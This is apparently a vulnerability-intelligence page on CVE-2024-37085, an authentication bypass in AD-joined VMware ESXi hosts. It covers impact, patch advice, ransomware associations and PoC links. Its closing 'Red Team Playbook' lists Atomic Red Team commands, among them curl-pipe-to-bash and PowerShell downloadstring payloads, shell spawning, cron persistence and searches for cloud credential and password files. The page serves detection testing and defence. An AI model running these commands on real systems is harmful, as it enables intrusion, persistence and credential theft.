CVE-2024-37085
Overview
This vulnerability is an authentication bypass affecting VMware ESXi hosts configured to use Active Directory (AD) for user management. The root cause lies in improper validation of AD group recreation, where the system trusts a newly created AD group with the same name as a previously deleted one. This flaw affects the ESXi host's integration with AD group membership for administrative access control.
Vulnerability Description
VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD.
Impact
An attacker with elevated privileges in Active Directory can bypass ESXi host authentication controls by re-creating the deleted administrative AD group, thereby gaining full administrative access to the ESXi host. This access enables complete control over the host, including configuration changes, VM management, and potential lateral movement within the environment. The prerequisite is that the attacker already holds sufficient AD permissions to delete and create groups. The business impact includes full system compromise and potential exposure or disruption of virtualized infrastructure.
Solution
VMware has addressed this issue in their security advisory VMSA-2024-0005, which covers ESXi versions 7.0 and 8.0. Administrators should apply the patches provided in this advisory promptly. Detailed patch instructions and updates are available at VMware's official security advisory page: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24505. No workaround is recommended; patching is the primary mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
akira
|
1529 | ransomware.live |
|
blackbasta
|
523 | ransomware.live |
|
blackbyte
|
147 | correlation_mitre |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The authentication bypass vulnerability in VMware ESXi represents a significant risk for organizations utilizing Active Directory (AD) for user management. This flaw allows a malicious actor with sufficient permissions within AD to gain unauthorized access to an ESXi host. The vulnerability arises when the configured AD group, typically 'ESXi Admins', is deleted and subsequently recreated. The system does not adequately validate the authenticity of the recreated group, thus allowing the attacker to exploit this oversight and assume control over the ESXi host. This situation highlights a critical weakness in the integration of VMware's virtualization platform with AD, particularly in how it handles group memberships and permissions.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with the necessary AD permissions can delete the 'ESXi Admins' group and then recreate it, effectively granting themselves full administrative access to the ESXi host. This scenario could unfold in environments where AD is used extensively for user management, making it easier for an insider threat or a compromised account to exploit the vulnerability. Additionally, if the attacker has prior knowledge of the ESXi host's configuration and the permissions associated with the 'ESXi Admins' group, the likelihood of successful exploitation increases significantly. The ability to manipulate AD groups without proper oversight creates a pathway for unauthorized access, which can lead to further attacks within the virtualized infrastructure.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on VMware ESXi for critical operations. Gaining administrative access to an ESXi host allows an attacker to manipulate virtual machines, access sensitive data, and potentially pivot to other systems within the network. This can lead to data breaches, service disruptions, and significant financial losses. Moreover, the reputational damage that accompanies such incidents can be detrimental, especially in industries where data integrity and security are paramount. The risk is exacerbated in environments where multiple ESXi hosts are managed, as a single compromised host can serve as a foothold for further attacks across the infrastructure.
To detect and mitigate this vulnerability, organizations should implement robust monitoring and logging of AD group changes, particularly those related to critical groups like 'ESXi Admins'. Regular audits of AD permissions and group memberships can help identify unauthorized changes and potential exploitation attempts. Additionally, organizations should enforce the principle of least privilege, ensuring that only necessary personnel have permissions to modify AD groups. Employing multi-factor authentication for accessing AD and ESXi hosts can also add an additional layer of security, making it more challenging for attackers to gain access even if they have compromised an account with sufficient permissions.
In conclusion, the authentication bypass vulnerability in VMware ESXi poses a serious threat to organizations leveraging AD for user management. The potential for exploitation by malicious actors with AD permissions highlights the need for stringent security measures and proactive monitoring. By understanding the technical details, potential attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to defend against unauthorized access and protect their critical virtualized environments. Implementing effective detection and mitigation strategies will be essential in safeguarding against the risks associated with this vulnerability.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-37085, coinciding with the recent inclusion of this vulnerability in the KEV catalog and its confirmed use by multiple ransomware groups such as Akira and Blackbasta. While the EPSS score shows a slight decline, our telemetry indicates a sharp increase in detection activity, suggesting adversaries are actively leveraging new proof-of-concept exploits circulating on public repositories. This shift underscores an elevated risk to organizations relying on Active Directory-integrated VMware ESXi environments, as attackers with sufficient AD privileges can bypass authentication controls more readily. The convergence of ransomware campaigns exploiting this flaw amplifies the threat landscape, increasing the likelihood of impactful intrusions and data compromise. Consequently, the threat level for CVE-2024-37085 has intensified, warranting heightened vigilance despite the modest downward trend in EPSS metrics.
Update 2 — May 21, 2026
Recent updates to CVE-2024-37085 reveal a nuanced shift in the threat landscape. While our telemetry indicates a significant reduction in detection activity related to this vulnerability, the EPSS score has increased modestly, reflecting a slightly elevated likelihood of exploitation in the near term. This divergence suggests that although active exploitation attempts may have temporarily declined, the underlying risk remains persistent, particularly given the vulnerability’s inclusion in the KEV catalog with confirmed ransomware group associations such as Akira and Blackbasta. The presence of multiple proof-of-concept exploits on public repositories continues to lower the barrier for adversaries with sufficient Active Directory privileges to bypass authentication controls on VMware ESXi hosts. Consequently, defenders should recognize that despite a temporary lull in observable exploitation, the threat remains dynamic and capable of rapid resurgence. The updated CVSS score reduction to 6.8 does not materially diminish the operational risk, as the vulnerability’s exploitation potential is amplified by its integration into active ransomware campaigns. Overall, the threat level for CVE-2024-37085 remains elevated, warranting sustained vigilance and monitoring for shifts in attacker behavior.
Update 3 — June 09, 2026
Recent updates to CVE-2024-37085 reveal a moderate increase in its assessed severity, with the CVSS score rising from 6.8 to 7.2, accompanied by a corresponding uptick in the Exploit Prediction Scoring System (EPSS) score. CSURFACE threat intelligence notes this adjustment reflects growing confidence in the vulnerability’s exploitability and its integration into active ransomware campaigns, particularly those linked to groups such as Akira, BlackBasta, and BlackByte. Our telemetry indicates a steady upward trend in exploitation attempts, supported by the emergence of new proof-of-concept exploits publicly available on GitHub, which lower the barrier for adversaries to weaponize this flaw. This evolving landscape underscores the heightened operational risk posed by CVE-2024-37085, as attackers leverage its authentication bypass mechanism to gain full administrative control over VMware ESXi hosts configured with Active Directory. The increased EPSS score and ransomware associations signify that the vulnerability is not only theoretically exploitable but actively targeted in the wild, warranting elevated threat prioritization. Defenders should interpret these developments as a signal of sustained and potentially expanding adversary interest, reinforcing the need for continuous monitoring and rapid detection capabilities to identify exploitation attempts before they culminate in broader compromise.
Update 4 — July 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-37085, with telemetry indicating a doubling in detection frequency over recent monitoring periods. This surge coincides with the emergence of new proof-of-concept exploits circulating on public repositories, which lower the technical barrier for adversaries to leverage the authentication bypass vulnerability on VMware ESXi hosts integrated with Active Directory. The persistence of ransomware groups such as Akira and Blackbasta in campaigns exploiting this flaw underscores its operational utility in post-compromise lateral movement and privilege escalation. Although the EPSS score remains stable, the qualitative increase in observed activity and expanded exploit availability elevate the practical risk of successful intrusions. For defenders, this development signals an intensified threat environment where opportunistic and sophisticated actors alike are more actively weaponizing this vulnerability, necessitating heightened vigilance in monitoring ESXi environments and associated Active Directory configurations.
Affected Products (13)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 7.0 |
cpe:2.3:o:vmware:esxi:7.0:*:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 8.0 |
cpe:2.3:o:vmware:esxi:8.0:-:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 8.0 |
cpe:2.3:o:vmware:esxi:8.0:a:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 8.0 |
cpe:2.3:o:vmware:esxi:8.0:b:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 8.0 |
cpe:2.3:o:vmware:esxi:8.0:c:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 8.0 |
cpe:2.3:o:vmware:esxi:8.0:update_1:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 8.0 |
cpe:2.3:o:vmware:esxi:8.0:update_1a:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 8.0 |
cpe:2.3:o:vmware:esxi:8.0:update_1c:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 8.0 |
cpe:2.3:o:vmware:esxi:8.0:update_1d:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 8.0 |
cpe:2.3:o:vmware:esxi:8.0:update_2:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 8.0 |
cpe:2.3:o:vmware:esxi:8.0:update_2b:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 8.0 |
cpe:2.3:o:vmware:esxi:8.0:update_2c:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
mahmutaymahmutay/CVE-2024-37085
Vulnerability Scanner for CVE-2024-37085 and Exploits ( For Educational Purpose only)
|
mahmutaymahmutay | 2 | 0 | 2024-08-02 | View |
|
WTN-arny/CVE-2024-37085
|
WTN-arny | 0 | 0 | 2024-08-18 | View |
|
WTN-arny/Vmware-ESXI
CVE-2024-37085 unauthenticated shell upload to full administrator on domain-joined esxi hypervisors.
|
WTN-arny | 0 | 0 | 2024-08-12 | View |
Ransomware Groups 3
Threat Feed
14 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: AnyDesk, Cobalt Strike, Dell Client driver (BYOVD), GIGABYTE Motherboard driver (BYOVD), MSI Afterburner driver (BYOVD) (147 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability. Tools: AnyDesk, Cobalt Strike, Dell Client driver (BYOVD), GIGABYTE Motherboard driver (BYOVD), MSI Afterburner driver (BYOVD) (147 known victims)
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-37085 |
| support.broadcom.com |
GitHub CVE
|
https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24505 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-37085 |